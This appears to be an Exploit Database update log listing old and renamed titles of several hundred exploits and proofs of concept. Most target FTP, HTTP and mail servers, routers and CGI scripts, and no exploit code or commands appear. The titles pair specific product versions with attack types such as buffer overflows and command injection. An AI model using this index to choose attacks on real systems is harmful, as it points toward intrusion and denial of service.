DB: 2017-10-27

2 new exploits

Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit
Microsoft Windows XP/2000 - TCP Connection Reset

WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflows (PoC)
WinEggDropShell 1.7 - Unauthenticated Multiple Remote Stack Overflows (PoC)

FileCOPA FTP Server 1.01 - 'USER' Remote Unauthenticated Denial of Service
FileCOPA FTP Server 1.01 - 'USER' Unauthenticated Remote Denial of Service

Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)
Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)

Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)
Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)

Simple HTTPD 1.41 - '/aux' Remote Denial of Service
Simple HTTPd 1.41 - '/aux' Remote Denial of Service

MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service

Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service
Oracle Internet Directory 10.1.4 - Unauthenticated Remote Denial of Service

Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service
Linksys WAG54G v2 Wireless ADSL Router - HTTPd Denial of Service

Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption
Nofeel FTP Server 3.6 - 'CWD' Remote Memory Consumption

Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service
Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service

XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service

httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)
httpdx 1.5.2 - Unauthenticated Remote Denial of Service (PoC)

httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service Vulnerabilities (PoC)
httpdx 1.5.3b - Unauthenticated Remote Denial of Service Multiple Vulnerabilities (PoC)

eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crashs (SEH) (PoC)
eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Crashs (SEH) (PoC)

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service
(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service

Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC)
Motorola SB5101 Hax0rware Rajko HTTPd - Remote Exploit (PoC)

Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service
Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)

Objectivity/DB - Lack of Authentication Remote Exploit
Objectivity/DB - Lack of Authentication

IPComp - encapsulation Unauthenticated kernel memory Corruption
IPComp - encapsulation Unauthenticated Kernel Memory Corruption

Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)
Crush FTP 5 - 'APPE' Remote JVM Blue Screen of Death (PoC)

torrent-stats - httpd.c Denial of Service
torrent-stats - 'httpd.c' Denial of Service

Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor status.cgi Denial of Service
Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor 'status.cgi' Denial of Service

WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service
WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service

Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service
Linksys BEFSR41 1.4x - 'Gozila.cgi' Denial of Service

BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service
BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service

Surfboard httpd 1.1.9 - Remote Buffer Overflow
Surfboard HTTPd 1.1.9 - Remote Buffer Overflow

RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service
RobotFTP Server 1.0/2.0 - Unauthenticated Remote Command Denial of Service

Titan FTP Server 3.0 - 'LIST' Command Denial of Service
Titan FTP Server 3.0 - 'LIST' Denial of Service

Monkey HTTPD 1.1.1 - Crash (PoC)
Monkey HTTPd 1.1.1 - Crash (PoC)

Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow
Alt-N MDaemon 2-8 - IMAP Unauthenticated Remote Buffer Overflow

Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow
Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow

Surgemail and WebMail 3.0 - 'Page' Command Remote Format String
Surgemail and WebMail 3.0 - 'Page' Remote Format String

Call of Duty 4 1.5 - Malformed 'stats' Command Denial of Service
Call of Duty 4 1.5 - 'stats' Denial of Service

Softalk Mail Server 8.5.1 - 'APPEND' Command Remote Denial of Service
Softalk Mail Server 8.5.1 - 'APPEND' Remote Denial of Service

FileCOPA FTP Server 5.01 - 'NOOP' Command Denial of Service
FileCOPA FTP Server 5.01 - 'NOOP' Denial of Service

Hybserv2 - ':help' Command Denial of Service
Hybserv2 - ':help' Denial of Service

Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service
Titan FTP Server 8.40 - 'APPE' Remote Denial of Service

TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow
TYPSoft FTP Server 1.1 - 'APPE' Remote Buffer Overflow

Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service
Sony Bravia KDL-32CX525 - 'hping' Remote Denial of Service
SmallFTPd 1.0.3 - 'mkd' Command Denial of Service
freeFTPd 1.0.8 - 'mkd' Command Denial of Service
SmallFTPd 1.0.3 - 'mkd' Denial of Service
freeFTPd 1.0.8 - 'mkd' Denial of Service

Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service
Wireshark 2.2.0 < 2.2.12 - ROS Dissector Denial of Service

AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation
AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation

xp-AntiSpy 3.9.7-4 - '.xpas' file Buffer Overflow
xp-AntiSpy 3.9.7-4 - '.xpas' File Buffer Overflow

GTA SA-MP server.cfg - Buffer Overflow (Metasploit)
GTA SA-MP - 'server.cfg' Buffer Overflow (Metasploit)

SCO Unixware 7.1 - 'pkg' command Exploit
SCO Unixware 7.1 - 'pkg' Exploit

Caldera UnixWare 7.1.1 - WebTop SCOAdminReg.cgi Arbitrary Command Execution
Caldera UnixWare 7.1.1 - WebTop 'SCOAdminReg.cgi' Arbitrary Command Execution

OSSEC 2.7 < 2.8.1 - 'diff' Command Privilege Escalation
OSSEC 2.7 < 2.8.1 - 'diff' Privilege Escalation

Microsoft Windows 10 - pcap Driver Privilege Escalation
Microsoft Windows 10 - 'pcap' Driver Privilege Escalation
PHPMailer < 5.2.21 - Local File Disclosure
HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow

Apache 2.0.45 - APR Remote Exploit
Apache 2.0.45 - 'APR' Remote Exploit

RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Exploit

Pavuk Digest - Authentication Buffer Overflow Remote Exploit
Pavuk Digest - Authentication Remote Buffer Overflow

3CServer 1.1 - FTP Server Remote Exploit
3CServer 1.1 (FTP Server) - Remote Exploit

LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit
LimeWire 4.1.2 < 4.5.6 - 'GET' Remote Exploit

MailEnable Enterprise 1.x - Imapd Remote Exploit
MailEnable Enterprise 1.x - IMAPd Remote Exploit

Sumus 0.2.2 - httpd Remote Buffer Overflow
Sumus 0.2.2 - HTTPd Remote Buffer Overflow

Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit
Symantec Scan Engine 5.0.x - Change Admin Password

Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Exploit

CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow
CoreHTTP 0.5.3alpha - HTTPd Remote Buffer Overflow

Postcast Server Pro 3.0.61 - / Quiksoft EasyMail 'emsmtp.dll 6.0.1' Buffer Overflow
Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Buffer Overflow

Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow
Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow

SonicWALL SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit
SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Exploit

simple httpd 1.38 - Multiple Vulnerabilities
Simple HTTPd 1.38 - Multiple Vulnerabilities

Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB)
Cisco IOS 12.3(18) (FTP Server)  - Remote Exploit (Attached to GDB)

freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)
freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)

Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)
Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Buffer Overflow (Metasploit)

Home FTP Server - 'MKD' Command Directory Traversal
Home FTP Server - 'MKD' Directory Traversal

Apple iTunes 8.1.x - 'daap' Buffer Overflow Remote Exploit
Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow

eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (1)
eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (1)

eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (2)
eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (2)

EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - 'MKD' Authenticated Remote Buffer Overflow

Xftp client 3.0 - PWD Remote Exploit
Xftp client 3.0 - 'PWD' Remote Exploit

ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)
ProSSHD 1.2 - Authenticated Remote Exploit (ASLR + DEP Bypass)
EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - 'MKD' Authenticated Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - 'CWD' Authenticated Remote Buffer Overflow

EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit)

CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Buffer Overflow (Metasploit)

Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit)
Alt-N MDaemon 6.8.5 - WorldClient 'form2raw.cgi' Stack Buffer Overflow (Metasploit)

Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit)
Linksys WRT54 Access Point - 'apply.cgi' Buffer Overflow (Metasploit)

Progea Movicon 11 - TCPUploadServer Remote Exploit
Progea Movicon 11 - 'TCPUploadServer' Remote Exploit

PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)
PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit)

Freefloat FTP Server - 'LIST' Command Buffer Overflow
Freefloat FTP Server - 'LIST' Buffer Overflow

KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow
KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow

SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit
SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Exploit

Matt Wright - FormHandler.cgi 2.0 Reply Attachment
Matt Wright - 'FormHandler.cgi' 2.0 Reply Attachment

Solution Scripts Home Free 1.0 - search.cgi Directory Traversal
Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal

CNC Technology BizDB 1.0 - bizdb-search.cgi Remote Command Execution
CNC Technology BizDB 1.0 - 'bizdb-search.cgi' Remote Command Execution

3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution
3R Soft MailStudio 2000 2.0 - 'userreg.cgi' Arbitrary Command Execution

Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote 'Username' and Password Retrieval
Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval

Greg Matthews - Classifieds.cgi 1.0 MetaCharacter
Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter

Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection
Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection

Leif M. Wright - ad.cgi 1.0 Unchecked Input
Leif M. Wright - 'ad.cgi' 1.0 Unchecked Input

NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval
NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval

SWSoft ASPSeek 1.0 - s.cgi Buffer Overflow
SWSoft ASPSeek 1.0 - 's.cgi' Buffer Overflow
Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read
Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read
Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read
Drummond Miles A1Stats 1.0 - 'a1disp2.cgi' Traversal Arbitrary File Read
Drummond Miles A1Stats 1.0 - 'a1disp3.cgi' Traversal Arbitrary File Read
Drummond Miles A1Stats 1.0 - 'a1disp4.cgi' Traversal Arbitrary File Read

Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing
Tarantella Enterprise 3 3.x - 'TTAWebTop.cgi' Arbitrary File Viewing
NCSA httpd 1.x - Buffer Overflow (1)
NCSA httpd 1.x - Buffer Overflow (2)
NCSA HTTPd 1.x - Buffer Overflow (1)
NCSA HTTPd 1.x - Buffer Overflow (2)

BPM Studio Pro 4.2 - HTTPD Directory Traversal
BPM Studio Pro 4.2 - HTTPd Directory Traversal
Light HTTPD 0.1 - GET Buffer Overflow (1)
Light HTTPD 0.1 - GET Buffer Overflow (2)
Light HTTPd 0.1 - GET Buffer Overflow (1)
Light HTTPd 0.1 - GET Buffer Overflow (2)

Null HTTPD 0.5 - Remote Heap Corruption
Null HTTPd 0.5 - Remote Heap Corruption

Boozt Standard 0.9.8 - index.cgi Buffer Overrun
Boozt Standard 0.9.8 - 'index.cgi' Buffer Overrun

Webmin 0.9x / Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access
Webmin 0.9x / Usermin 0.9x/1.0 - Unauthenticated Access Session ID Spoofing

Axis Communications Video Server 2.x - Command.cgi File Creation
Axis Communications Video Server 2.x - 'Command.cgi' File Creation

Freefloat FTP Server - 'PUT' Command Buffer Overflow
Freefloat FTP Server - 'PUT' Buffer Overflow
MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (1)
MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (2)
MNOGoSearch 3.1.20 - 'search.cgi?UL' Buffer Overflow (1)
MNOGoSearch 3.1.20 - 'search.cgi?UL' Buffer Overflow (2)
MySQL - Remote Unauthenticated User Enumeration
(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit
MySQL - Unauthenticated Remote User Enumeration
(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass

Freefloat FTP Server - 'USER' Command Buffer Overflow
Freefloat FTP Server - 'USER' Buffer Overflow

Mephistoles HTTPD 0.6 - Cross-Site Scripting
Mephistoles HTTPd 0.6 - Cross-Site Scripting

SurgeLDAP 1.0 - User.cgi Directory Traversal
SurgeLDAP 1.0 - 'User.cgi' Directory Traversal

Nagios3 - history.cgi Remote Command Execution
Nagios3 - 'history.cgi' Remote Command Execution

Nagios3 - history.cgi Host Command Execution (Metasploit)
Nagios3 - 'history.cgi' Host Command Execution (Metasploit)

Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun
Firebird 1.0 - Unauthenticated Remote Database Name Buffer Overrun

acme thttpd 2.0.7 - Directory Traversal
Acme thttpd 2.0.7 - Directory Traversal

Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow
Freefloat FTP Server 1.0 - 'Raw' Buffer Overflow

NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit)
NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)

Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)
Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)

Linksys WRT54GL - apply.cgi Command Execution (Metasploit)
Linksys WRT54GL - 'apply.cgi' Command Execution (Metasploit)

NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit)
NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)

SAP ConfigServlet - Remote Unauthenticated Payload Execution (Metasploit)
SAP ConfigServlet - Unauthenticated Remote Payload Execution (Metasploit)

GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)
GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)

Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)
Linksys WRT160N v2 - 'apply.cgi' Remote Command Injection (Metasploit)

WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal
WhitSoft SlimServe HTTPd 1.0/1.1 - Directory Traversal

Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit
Nginx 1.3.9/1.4.0 (x86) - Brute Force

PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow
PCMan FTP Server 2.07 - 'PASS' Buffer Overflow
Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption
PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow
Mikrotik RouterOS sshd (ROSSSH) - Unauthenticated Remote Heap Corruption
PCMan FTP Server 2.07 - 'STOR' Buffer Overflow

Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting
Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting

PCMan FTP Server 2.07 - 'STOR' Command Stack Overflow (Metasploit)
PCMan FTP Server 2.07 - 'STOR' Stack Overflow (Metasploit)

Supermicro Onboard IPMI - close_window.cgi Buffer Overflow (Metasploit)
Supermicro Onboard IPMI - 'close_window.cgi' Buffer Overflow (Metasploit)

Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - setup.cgi Cross-Site Scripting Vulnerabilities
Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - 'setup.cgi' Cross-Site Scripting

TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Vulnerabilities
TinTin++ / WinTin++ 1.97.9 - '#chat' Multiple Vulnerabilities
PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow
PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow
PCMan FTP Server 2.07 - 'ABOR' Buffer Overflow
PCMan FTP Server 2.07 - 'CWD' Buffer Overflow

Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Stack Buffer Overflow

Ultra Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit
Ultra Mini HTTPD 1.21 - 'POST' Stack Buffer Overflow

ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal
ALFTP FTP Client 4.1/5.0 - 'LIST' Directory Traversal

Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal
Glub Tech Secure FTP 2.5.15 - 'LIST' Directory Traversal
UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal
WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal
Classic FTP 1.02 - 'LIST' Command Directory Traversal
UltraEdit 14.00b - FTP/SFTP 'LIST' Directory Traversal
WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal
Classic FTP 1.02 - 'LIST' Directory Traversal

AceFTP 3.80.3 - 'LIST' Command Directory Traversal
AceFTP 3.80.3 - 'LIST' Directory Traversal

RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Command Directory Traversal
RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Directory Traversal

Vtiger - Install Unauthenticated Remote Command Execution (Metasploit)
Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit)

httpdx 1.5 - 'MKD' Command Directory Traversal
httpdx 1.5 - 'MKD' Directory Traversal

D-Link Devices - Authentication.cgi Buffer Overflow (Metasploit)
D-Link Devices - 'Authentication.cgi' Buffer Overflow (Metasploit)

rbot 0.9.14 - '!react' Command Unauthorized Access
rbot 0.9.14 - '!react' Unauthorized Access

VMTurbo Operations Manager 4.6 - vmtadmin.cgi Remote Command Execution (Metasploit)
VMTurbo Operations Manager 4.6 - 'vmtadmin.cgi' Remote Command Execution (Metasploit)

Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow
Solar FTP Server 2.1.1 - 'PASV' Remote Buffer Overflow
Freefloat FTP Server - 'ALLO' Command Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'MKD' Command Buffer Overflow
Freefloat FTP Server - 'ALLO' Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'MKD' Buffer Overflow

Endian Firewall 2.4 - openvpn_users.cgi PATH_INFO Cross-Site Scripting
Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting

PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'PUT' Buffer Overflow

PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'GET' Buffer Overflow

PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow

Zpanel - Remote Unauthenticated Remote Code Execution (Metasploit)
Zpanel - Unauthenticated Remote Code Execution (Metasploit)

PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow (Metasploit)
PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow (Metasploit)

IPFire - proxy.cgi Remote Code Execution (Metasploit)
IPFire - 'proxy.cgi' Remote Code Execution (Metasploit)

PCMan FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)
PCMan FTP Server 2.0.7 - 'ls' Buffer Overflow (Metasploit)

EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit
EasyFTP Server 1.7.0.11 - 'APPE'  Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'DELETE' Buffer Overflow
Freefloat FTP Server 1.0 - 'ABOR' Buffer Overflow
Freefloat FTP Server 1.0 - 'RMD' Buffer Overflow
Freefloat FTP Server 1.0 - 'HOST' Buffer Overflow
Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'RENAME' Buffer Overflow
PCMan FTP Server 2.0.7 - 'UMASK' Buffer Overflow
Freefloat FTP Server 1.0 - 'DIR' Buffer Overflow
PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow
BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'ACCT' Buffer Overflow
Freefloat FTP Server 1.0 - 'SITE ZONE' Buffer Overflow
PCMan FTP Server 2.0.7 - 'NLST' Buffer Overflow
PCMan FTP Server 2.0.7 - 'SITE CHMOD' Buffer Overflow
PCMan FTP Server 2.0.7 - 'PORT' Buffer Overflow
BolinTech DreamFTP Server 1.02 - 'RETR' Remote Buffer Overflow

NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit)
NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)

VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)
VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Unauthenticated Command Execution (Metasploit)

CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit
CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Exploit

phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit
phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote Exploit

eXtropia Shopping Cart - web_store.cgi Remote Exploit
eXtropia Shopping Cart - 'web_store.cgi' Remote Exploit

Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit
Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote Exploit

TFT Gallery 0.10 - Password Disclosure Remote Exploit
TFT Gallery 0.10 - Password Disclosure

XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit
XOOPS 2.0.13.2 - 'xoopsOption[nocommon]' Remote Exploit

Drupal 4.7 - attachment mod_mime Remote Exploit
Drupal 4.7 - 'Attachment mod_mime' Remote Exploit

Cahier de texte 2.0 - Database Backup/Source Disclosure Remote Exploit
Cahier de texte 2.0 - Database Backup / Source Disclosure

CSPartner 1.0 - Delete All Users / SQL Injection Remote Exploit
CSPartner 1.0 - Delete All Users / SQL Injection

Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit
Podcast Generator 1.2 - Unauthorized Re-Installation

SPIP < 2.0.9 - Arbitrary Copy All Passwords to .XML File Remote Exploit
SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File

Nagios3 - statuswml.cgi Command Injection (Metasploit)
Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)

QuickTime Streaming Server - parse_xml.cgi Remote Execution (Metasploit)
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)

Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)
Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)

E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit)
E-Mail Security Virtual Appliance - 'learn-msg.cgi' Command Injection (Metasploit)

AHG Search Engine 1.0 - search.cgi Arbitrary Command Execution
AHG Search Engine 1.0 - 'search.cgi' Arbitrary Command Execution
CGIScript.net - csPassword.cgi 1.0 Information Disclosure
CGIScript.net - csPassword.cgi 1.0 HTAccess File Modification
CGIScript.net - 'csPassword.cgi' 1.0 Information Disclosure
CGIScript.net - 'csPassword.cgi' 1.0 HTAccess File Modification

MailReader.com 2.3.x - NPH-MR.cgi File Disclosure
MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure

BizDesign ImageFolio 2.x/3.0.1 - nph-build.cgi Cross-Site Scripting
BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting
cPanel 5.0 - Guestbook.cgi Remote Command Execution (1)
cPanel 5.0 - Guestbook.cgi Remote Command Execution (2)
cPanel 5.0 - Guestbook.cgi Remote Command Execution (3)
cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)
cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (1)
cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (2)
cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (3)
cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (4)

HappyMall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Command Execution
HappyMall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Command Execution

HappyMall E-Commerce Software 4.3/4.4 - Member_HTML.cgi Command Execution
HappyMall E-Commerce Software 4.3/4.4 - 'Member_HTML.cgi' Command Execution

Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Cross-Site Scripting
Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Cross-Site Scripting

Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure
Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' File Disclosure

Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting
Zeus Web Server 4.x - Admin Interface 'VS_Diag.cgi' Cross-Site Scripting

ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal
ImageFolio 2.2x/3.0/3.1 - 'Admin.cgi' Directory Traversal

